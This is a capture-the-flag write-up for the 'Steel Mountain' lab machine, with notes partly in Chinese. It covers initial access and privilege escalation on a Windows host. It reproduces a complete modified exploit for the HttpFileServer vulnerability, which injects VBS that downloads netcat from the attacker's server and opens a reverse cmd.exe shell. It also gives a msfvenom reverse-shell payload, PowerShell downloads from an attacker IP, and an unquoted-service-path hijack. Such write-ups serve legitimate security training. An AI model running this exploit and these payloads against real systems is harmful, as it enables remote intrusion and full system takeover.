Steel Mountain

# Steel Mountain [TOC] ## Initial Access >Scan the machine with nmap. What is the other port running a web server on? ![](https://i.imgur.com/VrTEQvn.png) --- >Take a look at the other web server. What file server is running? ![](https://i.imgur.com/DtcVbiW.png) --- What is the CVE number to exploit this file server? ![](https://i.imgur.com/Vs6KR7C.png) --- >Use Metasploit to get an initial shell. What is the user flag? ![](https://i.imgur.com/fjlhUZa.png) --- >Use Metasploit to get an initial shell. What is the user flag? 透過 HTTP 請求向遠端主機發送資料。 ``` import urllib2 ``` --- ### VBS script Download NC.exe on target machine ``` def script_create(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}") ``` ``` "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with" ``` --- ### Reverse Shell (NC) Connected back to our machine ``` def execute_script(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}") ``` ``` ip_addr = "192.168.44.128" #local IP address local_port = "443" # Local Port number ``` ``` exe= "exec|"+vbs2 vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port ``` --- ### Execute any commands ```py def nc_run(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}") ``` ``` vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port exe1= "exec|"+vbs3 ``` ![](https://i.imgur.com/Kmd7x3J.png) ## Privilege Escalation >PowerUp aims to common Windows privilege escalation vectors that rely on misconfigurations. https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc Download PowerUp script ![](https://i.imgur.com/uYFXZF6.png) Upload script ![](https://i.imgur.com/lH9d1YU.png) Load Powershell ``` load powershell help ``` ps1 是 PowerShell script 檔案的副檔名 Running the script ``` PS > . .\PowerUP.ps1 PS > Invoke-AllChecks ``` Unquoted Service Paths (Object Name:local systems) ![](https://i.imgur.com/Q8yWWqu.png) ![](https://i.imgur.com/FFwSUHL.png) There have path vulnerable->(space / parameter) ![](https://i.imgur.com/jeBdV8a.png) CanRestart option being true, allows us to restart a service on the system ![](https://i.imgur.com/FcOas2j.png) ### Generate backdoor ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.17.11.72 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe ``` Advance.exe ->Hijack ### Upload backdoor to gat Localsystems privilege ![](https://i.imgur.com/sd6cUkk.png) ### Restart the service ![](https://i.imgur.com/cqHa0bj.png) #### Gat the root shell OHHH ![](https://i.imgur.com/ueF0YkH.png) ![](https://i.imgur.com/SFsNVUh.png) ## Access and Escalation Without Metasploit https://www.exploit-db.com/exploits/39161 ```py #EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). # You may need to run it multiple times for success! ``` ![](https://i.imgur.com/zaU6WIc.png) ![](https://i.imgur.com/uumcxz4.png) ``` #!/usr/bin/python # This is a modification of the original exploit : https://www.exploit-db.com/exploits/39161 # works with python3 import urllib.request as urllib2 import sys try: def script_create(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}") def execute_script(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}") def nc_run(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}") ip_addr = "Your Local IP" #local IP address local_port = "4444" # Local Port number vbs = r"C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+":8000"+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with" save= "save|" + vbs vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs" exe= "exec|"+vbs2 vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port exe1= "exec|"+vbs3 script_create() execute_script() nc_run() except: print ("""[.]Something went wrong..! Usage is :[.] python exploit.py <Target IP address> <Target Port Number> Don't forgot to change the Local IP address and Port number on the script""") ``` --- ![](https://i.imgur.com/Y2O2x4P.png) --- ### Initial Access ![](https://i.imgur.com/IUM2qnA.png) ### Enumerate tools (winPEASx86) Powershell (bulit-in tools ) Reference https://adamtheautomator.com/powershell-download-file/ ``` Invoke-WebRequest -Uri http://10.17.11.72:8000/winPEASx86.exe -OutFile .\winPEASx86.exe ``` ``` powershell -c "Invoke-WebRequest -Uri http://10.17.11.72:8000/winPEASx86.exe -OutFile .\winPEASx86.exe " ``` C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winPEASx86.exe ![](https://i.imgur.com/OZMkblw.png) ![](https://i.imgur.com/8mTyBDp.png) ### Privilege escalation (PAHT HIJACK) ``` cd C:\Program Files (x86)\IObit\ powershell -c "Invoke-WebRequest -Uri http://10.17.11.72:8000/Advanced.exe -OutFile .\Advanced.exe " ``` ``` powershell -c "sc.exe stop AdvancedSystemCareService9" powershell -c "sc.exe start AdvancedSystemCareService9" ``` ![](https://i.imgur.com/Aa66fwz.png)